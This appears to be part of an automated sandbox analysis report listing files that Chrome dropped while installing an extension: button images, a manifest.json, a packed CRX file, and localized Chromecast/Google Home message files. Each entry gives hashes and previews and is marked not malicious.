Encrypted:	false
SSDEEP:	6:6v/lhPKM4nDsp7q1hKVlomsj9rxKNgtmN0VZ+GFYep:6v/7iMXVq1ylxemNgtmKVnYM
MD5:	0599DFD9107C7647F27E69331B0A7D75
SHA1:	3198C0A5F34DB67F91A0035DBC297354CBC95525
SHA-256:	131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
SHA-512:	0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...... ..Pp.X....H...b@...\|.^LC_.E.BP+......X.P..........q..~..p/. ..s.....%D^...$......@.!...<...).?.4{.k.G3...4..[cH..0..l.8.!r..m.R..{..........`.f...#.x.....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button_hover.png Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.423186859407619
Encrypted:	false
SSDEEP:	3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEHxrPLyN+ltNPhv/l2up:6v/lhPKM4nDspnAkZHVtERrPLygltNPn
MD5:	7CB6B9DC1A30F63B8BD976924B75AD96
SHA1:	0C40B0C496D2F2B5F2021C117EC8610AC03AB469
SHA-256:	721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
SHA-512:	4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B.z.s...*.....$.<u..[...................h.......C.CA).....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button_maximize.png Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	166
Entropy (8bit):	5.8155898293424775
Encrypted:	false
SSDEEP:	3:yionv//thPl3xWrA4RthwkBDsTBZttd//HmnFz1P/ZjXlUTqyCIc30ItK1p:6v/lhPKM4nDsptF/HOP/ZjXlUeyCo/p
MD5:	232CE72808B60CBE0F4FA788A76523DF
SHA1:	721A9C98C835D2CD734153BBE07833C6637ECD68
SHA-256:	AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
SHA-512:	4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...HIDATx......0.CQS.......~..."..........m.v+Sq....<!...M8m...'...@$..0....E........IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button_pressed.png Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.46068685940762
Encrypted:	false
SSDEEP:	3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEXIyN+ltN1/lsg1p:6v/lhPKM4nDspnAkZHVtEZgltN1eup
MD5:	E0862317407F2D54C85E12945799413B
SHA1:	FA557F8F761A04C41C9A4BA81994E43C6C275DBB
SHA-256:	5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
SHA-512:	07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B..@wu...*.....$.<u..[...................h.........M..x(....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\manifest.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	5.449026004350873
Encrypted:	false
SSDEEP:	24:1HEis7ViC/yox/fiqeUoLFlmF1s80FKrGfd0d3NZNZx1Fq7eY7nfj1B:WL7V2opiV1mvs8rxTZRczhB
MD5:	01334FB9D092AF2AA46C4185E405C627
SHA1:	47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
SHA-256:	F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
SHA-512:	888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
Malicious:	false
Preview:	{.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\560c3c5f-35c2-4968-b922-58652e03e960.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	768843
Entropy (8bit):	7.992932603402907
Encrypted:	true
SSDEEP:	12288:cK2ED9wjXNC1Gse83ru82/u0eKhgxuPFrDXgtbPz54Pm1D0fBmfH1sBrJ9mTiDga:cK2ED9I48seur0/uZKCuPNbgtbz6m1ob
MD5:	A11D5CAF6BF849AEB84B0C95B1C3B7CF
SHA1:	27F410CCBD75852C01C7464A1FD7EF8C29BE3916
SHA-256:	D0E62ACE64AFC334330A7AC3A2CC657914FEB321F1F89AEE11D2A6D0E7D81C31
SHA-512:	086C124DE3A01BE467647F3BCB4EA05105F690AB45417A0E3D38935ABA9E2381DF59AF98D0FFF7823CEFD5390B48807352E135AC70977AED7B413A8CC48FB590
Malicious:	false
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b.........6W..>Nuw9..R{c...Nq.H.K..A!....`v.k+..?.5.>v.....;.._~....tp....x.q.V...7.m.O.~.{!.o/q.'..BK..4./?'.....L..fH&.._<..&.p.k^..\s...:1y..F.N.+...X.PO@Mo....X.G1:..Y.@;..j..........=ae...0.......DU....n...n.;.Ipr..Q....:... <.....a.Y....{ei........0..0....H............0.......Mbh=.[O}.+..U.KHF(n3.\"...,g.c...6)..(.E...U...#.i.a..:...N.....P...x.O...(mC;\|.5.S.{m.aEx...[..fP.i`.y..5..R....v.$......l-m.............m....ni...`..W.....R.p.b.+...+.\k.R$e~.J\.&c%.d...M..j..V.%...+1F....D....X\.1ct.<........E.B.+.i@...8..^...&YR...I.o...,.....[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. D.'.N@.(..GK....m...A.0.."

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\am\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17307
Entropy (8bit):	5.461848619761356
Encrypted:	false
SSDEEP:	384:arfbEVrFvMP4rMhuDopC3vUuFBYZV6uml:aHEVrFvMP4KuFvr6D6uml
MD5:	26330929DF0ED4E86F06C00C03F07CE3
SHA1:	478F3B7E7A7E007BEE182B89C2EF6FFE6045E92C
SHA-256:	621B5139ED199022BB6529AF18ED4DC312AE9F3E90ECAF3B2C9E1D12114F5B22
SHA-512:	0BE6183A1BF12575C0F99960705D4249E79CDB8528C55FF132BE99A111F09494231AD6A36CD61B090A3B34C6971D68A29373BA346888E852C52E05DC14380682
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "...... ... ..... .. ...... .... ... .... ......?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": ".... ......".. },.. "1522140683318860351": {.. "message": "..... ....... .... ..... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "... ...".. },.. "1802762746589457177": {.. "message": "...".. },.. "1850397500312020388": {.. "message": ".$START_LINK$Google Home .......$END_LINK$ ... ...... Chromecast ..... .....? $START_SPAN$*$END_SPAN$",.. "placeholde

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ar\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	16809
Entropy (8bit):	5.458147730761559
Encrypted:	false
SSDEEP:	192:0IprKC78JmUjk8RkeryFOYPATxLZ8fsbE3/IFV6c8TEKdl:Jrp8JjA8RkerK0lc3wFV6uml
MD5:	44325A88063573A4C77F6EF943B0FC3E
SHA1:	78908D766F3E7A0E4545E7BD823C8ED47C7164EB
SHA-256:	67A439A08804EF4BEF261BDBADD8F0FEFD51729167D01EDCA99DD4AF57D6108B
SHA-512:	889C02BC986794C58C76022E78F57F867DD1D5217687F12D679A33A2DB9E5A18F3A37CF94D8FE4585E747C78E4662EAB93361FF7D945990774C7CFCACCFB79D1
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": ".. .. ........ ....... .... .... ... .......".. },.. "128276876460319075": {.. "message": "...... .......".. },.. "1428448869078126731": {.. "message": "..... .......".. },.. "1522140683318860351": {.. "message": "..... ........ .... ........ ... .....".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "..... .....".. },.. "1850397500312020388": {.. "message": "... ....... .. .... Chromecast .. $START_LINK$..... Google Home$END_LINK$. $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\bg\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	18086
Entropy (8bit):	5.408731329060678
Encrypted:	false
SSDEEP:	192:4jjpr342SIwPIasR9VhMkACVmrv8evj+3eXivOMbb2vVzCkwRV6V6c8TEKdl:4ZrYo+rxT+qOV6V6uml
MD5:	6911CE87E8C47223F33BEF9488272E40
SHA1:	980398F076BB7D451B18D7FDE2DE09041B1F55AD
SHA-256:	273DEF0F67F0FA080802B85EF6F334DE50A19408F46BDF41F0F099B1F5501EEA
SHA-512:	CDB69405BB553E46DCF02F71B1A394307D0051E7FA662DFFEBA7888F30DD933F13C7FD6E32F1D7AEAEE8746316873B6E1D92029724ABDC75E49DCC092172EA22
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": "... .. ........ ......... ...... ...-..... ....... ..?".. },.. "128276876460319075": {.. "message": "......... .. ..........".. },.. "1428448869078126731": {.. "message": "........ .. .........".. },.. "1522140683318860351": {.. "message": "........... .. .. ........ ...., ........ .......".. },.. "1550904064710828958": {.. "message": "......".. },.. "1636686747687494376": {.. "message": ".......".. },.. "1802762746589457177": {.. "message": ".... .. .....".. },.. "1850397500312020388": {.. "message": "....... .. ............ .. Chromecast . $START_LINK$............ Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "p

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\bn\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	19695
Entropy (8bit):	5.315564774032776
Encrypted:	false
SSDEEP:	384:PrUCrcTIOeswIW/Vre/sZn8TFfzheV6uml:lPswIWtoK8xfG6uml
MD5:	F9DDF525C07251282A3BFFCEE9A09ABB
SHA1:	A343A078E804AF400A8F3E1891E3390DA754A5CD
SHA-256:	C69C6C90F7EB8F10685CD815AF1F6F1B87CF30C4E8D95DF1D577DE1105AAD227
SHA-512:	EBD339C37162984672513019D470B92DF8B743DD69D4430361EF12D42FD1C208DBDE818A7BFE20BE8A7D63CD6E02B3F4344DEA1C4AEDB8719D789981A49DA44C
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".... ...".. },.. "1213957982723875920": {.. "message": "..... ....... ..... ........... ...... ....... ...... ...?".. },.. "128276876460319075": {.. "message": "...... ........".. },.. "1428448869078126731": {.. "message": "...... ......... ...".. },.. "1522140683318860351": {.. "message": "..... .... ...... ....... ... ... .... ...... .....".. },.. "1550904064710828958": {.. "message": ".........".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": ".....".. },.. "1850397500312020388": {.. "message": "$START_LINK$ Google

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ca\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15518
Entropy (8bit):	5.242542310885
Encrypted:	false
SSDEEP:	384:drGUBKxMF2ayv8FrIccUVFmwf+7d9VKS3V6uml:dCUBKxMFBy0FE3UzmQ+zkSl6uml
MD5:	A90CF7930E7C3BEC61EE252DEFAD574A
SHA1:	F630CA01114A7BDD39607CB84B8280CCE218A5C6
SHA-256:	A533740E17559E2ADF40B4555C60F21EEC84E92C09CDBC19EED033A0B4DD2474
SHA-512:	598F991B344FA6724617D6CE57BB0D6D64EF86B4F5317BF6AD5EDF43E6B0A385094E7885F7A8FA2B107405B31C3D9F76E92315BC1D9BB52ACD4ECAD342917DE1
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Es congela".. },.. "1213957982723875920": {.. "message": "Quina de les opcions.seg.ents descriu millor la vostra xarxa?".. },.. "128276876460319075": {.. "message": "Detecci. de dispositius".. },.. "1428448869078126731": {.. "message": "Flu.desa del v.deo".. },.. "1522140683318860351": {.. "message": "S'ha produ.t un error en la connexi.. Torneu-ho a provar.".. },.. "1550904064710828958": {.. "message": "Correcta".. },.. "1636686747687494376": {.. "message": "Perfecta".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Pots veure el Chromecast a l'$START_LINK$aplicaci. Google.Home$END_LINK$?$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\cs\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15552
Entropy (8bit):	5.406413558584244
Encrypted:	false
SSDEEP:	192:eVdprJrG5efiTk93ebrxZR1fdc8VDCwT9fTV6c8TEKdl:2rMqiQerxQ88W7V6uml
MD5:	17E753EE877FDED25886D5F7925CA652
SHA1:	8E4EC969777CC0CEB7C12D0C1B9D87EBBB9C4678
SHA-256:	C562FCCFCE374D446BFAC30AC9B18FF17E7A3EF101C919FF857104917F300382
SHA-512:	33D61F6327FC81D7A45AA2CC97922DC527F5F43E54AA1A1638DA6EE407024A2F10CFD82CC5C3C581C2E7B216276987CB26C3FA95198572E139ACF29CC5B7ADCB
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Video zamrz.".. },.. "1213957982723875920": {.. "message": "Kter. popis nejl.pe vystihuje va.i s..?".. },.. "128276876460319075": {.. "message": "Zji..ov.n. za..zen.".. },.. "1428448869078126731": {.. "message": "Plynulost videa".. },.. "1522140683318860351": {.. "message": "P.ipojen. se nezda.ilo. Zkuste to pros.m znovu.".. },.. "1550904064710828958": {.. "message": "Plynul.".. },.. "1636686747687494376": {.. "message": "Perfektn.".. },.. "1802762746589457177": {.. "message": "Hlasitost".. },.. "1850397500312020388": {.. "message": "Vid.te sv.j Chromecast v.$START_LINK$aplikaci Google Home $END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\da\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15340
Entropy (8bit):	5.2479291792849105
Encrypted:	false
SSDEEP:	192:+Upr8XnI1MY2kPuir8j7Rd3kbTWc4QtV6c8TEKdl:FrJ1H9br8h6eZCV6uml
MD5:	F08A313C78454109B629B37521959B33
SHA1:	3D585D52EC8B4399F66D4BE88CED10F4A034FCCC
SHA-256:	23BF7E5EDF70291CA6D8F4A64788C5B86379EECB628E3DFA7DD83344612F7564
SHA-512:	9F2868AEBBF7F6167A7EA120FE65E752F9A65D1DC51072AA2413B2FDE374DA2D169D455A4788E341717F694179E6F1FA80413C080D9CD8CB397C3E84668CBFEC
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Fryser".. },.. "1213957982723875920": {.. "message": "Hvilket af f.lgende udsagn beskriver bedst dit netv.rk?".. },.. "128276876460319075": {.. "message": "Enhedsregistrering".. },.. "1428448869078126731": {.. "message": "Videostabilitet".. },.. "1522140683318860351": {.. "message": "Forbindelsen blev afbrudt. Pr.v igen.".. },.. "1550904064710828958": {.. "message": "Problemfri".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Lydstyrke".. },.. "1850397500312020388": {.. "message": "Kan du se din Chromecast i $START_LINK$ Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "STAR

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\de\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15555
Entropy (8bit):	5.258022363187752
Encrypted:	false
SSDEEP:	192:AJprM71A4qyJSwlk5KR5rtXsmvL0xhVw921YV6c8TEKdl:2re3jJS5A5rt8msA2KV6uml
MD5:	980FB419ED6ED94AD75686AFFB4E4C2E
SHA1:	871BFBCA6BCBA9197811883A93C50C0716562D57
SHA-256:	585C7814AFD2453232BC940252D4AE821D6E6CBCFD74A793F78E5DB8BA5342F1
SHA-512:	1681FA9C3BA882250A5005FB807D759EB8A634F1AA011725B1C865C0028BE7AB7BC16DC821A7F5BBFBA84C91E7D663ADE715284798E7E84E8FFF2D254488882D
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "H.ngenbleiben".. },.. "1213957982723875920": {.. "message": "Welche dieser Aussagen beschreibt dein Netzwerk am besten?".. },.. "128276876460319075": {.. "message": "Ger.teerkennung".. },.. "1428448869078126731": {.. "message": "Videowiedergabequalit.t".. },.. "1522140683318860351": {.. "message": "Fehler beim Herstellen der Verbindung. Bitte versuche es noch einmal.".. },.. "1550904064710828958": {.. "message": "St.rungsfrei".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Lautst.rke".. },.. "1850397500312020388": {.. "message": "Siehst du deinen Chromecast in der $START_LINK$Google Home App$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\el\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17941
Entropy (8bit):	5.465343004010711
Encrypted:	false
SSDEEP:	384:S0rDuhLh41cZrP3TzDBknbpgo6djIV6uml:S0fuBh46ZD3TzDinbpgoUK6uml
MD5:	40EB778339005A24FF9DA775D56E02B7
SHA1:	B00561CC7020F7FE717B5F692884253C689A7C61
SHA-256:	F56BF7C171AA20038EE30B754478B69A98F3014C89362779B0A8788C7B9BEEE1
SHA-512:	8BED281A33EC1E4E88A9F9D62BB13FE0266C0FAF8856D1DC2A843D26DD3CE5E7D1400FD3325ABD783B0364EC4FB1188AD941D56AEB9073BC365BE0D12DE6C013
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": ".... ... .. ........ .......... ........ .. ...... ...;".. },.. "128276876460319075": {.. "message": ".......... ........".. },.. "1428448869078126731": {.. "message": "......... ......".. },.. "1522140683318860351": {.. "message": "........ ......... ......... .....".. },.. "1550904064710828958": {.. "message": ".....".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "...... ....".. },.. "1850397500312020388": {.. "message": "........ .. ..... .. Chromecast .... $START_LINK$........ Google Home$END_LINK$; $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\en\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	14897
Entropy (8bit):	5.197356586852831
Encrypted:	false
SSDEEP:	96:2MKUOp5N7GTNMRuv6M0bIt3FXGkW6/5NkkQ9NJKJhnH3t9F410sUA+ISN6cGDSyR:VKzprogudTGkWqrKcJhdIR+V6c8TEKdl
MD5:	8351AF4EA9BDD9C09019BC85D25B0016
SHA1:	F6EC1FFD291C8632758E01C9EE837B1AD18D4DCF
SHA-256:	F41C82D8A4F0E9B645656D630C882BE94A0FB7F8CEC0FE864B57298F0312B212
SHA-512:	75672B57F21F38F97341AD76A199AD764E9FBAB2384D701BF6EB06CEFDE6C4F20F047F9051A4E30D99621E5C1FBBDB9E38E8D2B47470806704B38DA130A146CF
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Freezes".. },.. "1213957982723875920": {.. "message": "Which of the following best describes your network?".. },.. "128276876460319075": {.. "message": "Device Discovery".. },.. "1428448869078126731": {.. "message": "Video Smoothness".. },.. "1522140683318860351": {.. "message": "Connection failed. Please try again.".. },.. "1550904064710828958": {.. "message": "Smooth".. },.. "1636686747687494376": {.. "message": "Perfect".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Are you able to see your Chromecast in the $START_LINK$ Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\es\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15560
Entropy (8bit):	5.236752363299121
Encrypted:	false
SSDEEP:	192:NAgprfy1pTCukFr+1DIyDRoanvV6c8TEKdl:KMrq6FrmvV6uml
MD5:	8A70C18BB1090AA4D500DE9E8E4A00EF
SHA1:	8AFC097FA956C1317DB0835348B2DA19F0789669
SHA-256:	FF173D1CEF665B1234E02F11070ABD2B65230318150734579A03C7F31B4AE3F4
SHA-512:	140BAF40A4ABE9B8AF0855B0EBB7DFDF17869EDFC4EE1037C5EA7FDD8EDEBD4850E055B6A4D7B8782657618BCE1517813779BA01BA993CC838BB43E0BE71EEEE
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Congelaci.n de im.genes".. },.. "1213957982723875920": {.. "message": ".Cu.l de las siguientes respuestas describe mejor tu red?".. },.. "128276876460319075": {.. "message": "Detecci.n de dispositivo".. },.. "1428448869078126731": {.. "message": "Fluidez del v.deo".. },.. "1522140683318860351": {.. "message": "Error en la conexi.n. Vuelve a intentarlo.".. },.. "1550904064710828958": {.. "message": "V.deo fluido".. },.. "1636686747687494376": {.. "message": "Perfecta".. },.. "1802762746589457177": {.. "message": "Volumen".. },.. "1850397500312020388": {.. "message": ".Puedes ver tu Chromecast en la $START_LINK$aplicaci.n Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\et\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	15139
Entropy (8bit):	5.228213017029721
Encrypted:	false
SSDEEP:	96:Z48bxhWYp5Ny5M63niwAKD4rrJSJ2RkPXh9P5NFP2+NBMU01jewUEVez3QOiSevy:ikxprot3lYkf/rHBc0KsUV6c8TEKdl
MD5:	A62F12BCBA6D2C579212CA2FF90F8266
SHA1:	F7E964A2D9BBDA364252BCE5CFBA3FD34FDD825E
SHA-256:	3EB3EB0B3B4A8E5A477D1B3C3A3891CCC7DC6B8879ECE243A7BD7C478068273D
SHA-512:	E300201245C00ADEC8F39D586875F8FA4607AB203572BF3CE353C1CA7CDCA05B8786810CA0CEE27E4EA54A5EFD53690F1EA7AA4148CFF472A66BB11202723566
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": "Hangub".. },.. "1213957982723875920": {.. "message": "Milline j.rgmistest v.idetest kirjeldab k.ige paremini teie v.rku?".. },.. "128276876460319075": {.. "message": "Seadme tuvastamine".. },.. "1428448869078126731": {.. "message": "Video sujuvus".. },.. "1522140683318860351": {.. "message": ".hendamine eba.nnestus. Proovige uuesti.".. },.. "1550904064710828958": {.. "message": ".htlane".. },.. "1636686747687494376": {.. "message": "T.iuslik".. },.. "1802762746589457177": {.. "message": "Helitugevus".. },.. "1850397500312020388": {.. "message": "Kas n.ete oma Chromecasti $START_LINK$rakenduses Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..

C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\fa\messages.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17004
Entropy (8bit):	5.485874780010479
Encrypted:	false
SSDEEP:	192:rngaIprIX/t9wkjTJrs3hqaXxRQdiIMDnD+LhfHdoltV6c8TEKdl:4rin5rU1X7Qd0M9CtV6uml
MD5:	852BD3CFF960F1BC3A2AAB3CB3874EF9
SHA1:	C9F6F3C776542889FE3B67971D65ACFE048A3A0A
SHA-256:	D87597B6C10364501B98AA42524843F109009CCEF022D8E0170440D7F144F4C6
SHA-512:	2A7AE4D70E33E53EE31831CE2E61DD8DF103C4170EC483BDA14B8788E5DD536EEE84DBA340CACBDF16889C7E6465B48D82C4714E746E8A7B372D12CBDF371C95
Malicious:	false
Preview:	{.. "1018984561488520517": {.. "message": ".... ... .......".. },.. "1213957982723875920": {.. "message": ".... .. .. ..... ... .... ... .. .. ...... ... ..... .......".. },.. "128276876460319075": {.. "message": "..... ......".. },.. "1428448869078126731": {.. "message": "..... .....".. },.. "1522140683318860351": {.. "message": "..... ...... .... ..... ...... ...... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": "..... ...".. },.. "1850397500312020388": {.. "message": ".... ......... Chromecast ... .. .. $START_LINK$ ...... Google Home$END_LINK$ ....... $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {..

